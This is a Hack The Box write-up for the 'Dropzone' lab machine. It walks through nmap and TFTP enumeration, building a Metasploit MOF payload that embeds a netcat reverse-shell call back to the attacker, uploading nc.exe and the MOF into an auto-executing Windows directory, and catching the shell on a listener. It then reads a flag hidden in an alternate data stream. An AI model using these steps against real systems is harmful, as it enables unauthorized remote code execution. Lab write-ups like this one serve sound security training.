Hack The Box: Dropzone




Difficulty: Medium Machine Creator: eks& rjesh Tools Used:

NMAP TFTP Metasploit NC Streams

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.90

nmap -sU 10.10.10.90

TFTP

tftp 10.10.10.90




Metasploit

Now we need to start generating our payload. We can exploit wmi using the psexec module in MSF. First, we need to select the psexec module

use exploit/windows/smb/psexec

then we need to drop down into an interactive ruby shell

irb

now we need to generate our mof file. We will include NC command along with our local IP and port 1337.

puts generate_mof(“test1″,”test2”)



Upload NC.exe

NC.exe is not in windows by default, so we need to upload it using TFTP.

First, we should copy nc.exe to our current directory.

cp /usr/share/windows-binaries/nc.exe

Now we can upload nc.exe to the remote server.


NC Listener

nc -lvnp 1337


1337 is our local port to listen on.

Upload mof file

The directory that we will be uploading to will auto execute the file.

put exploit.mof /windows/system32/wbem/mof/exploit.mof

Root.txt


We have another directory on the desktop for flags lets check that out.


Streams

We need to download a program called streams by Sysinternals this will allow us to view alternate data streams.

https://docs.microsoft.com/en-us/sysinternals/downloads/streams

Now we can view the file using streams. Sysinternals always requires you to accept the EULA, and we can use a wildcard character for the file name.

streams -accepteula 2*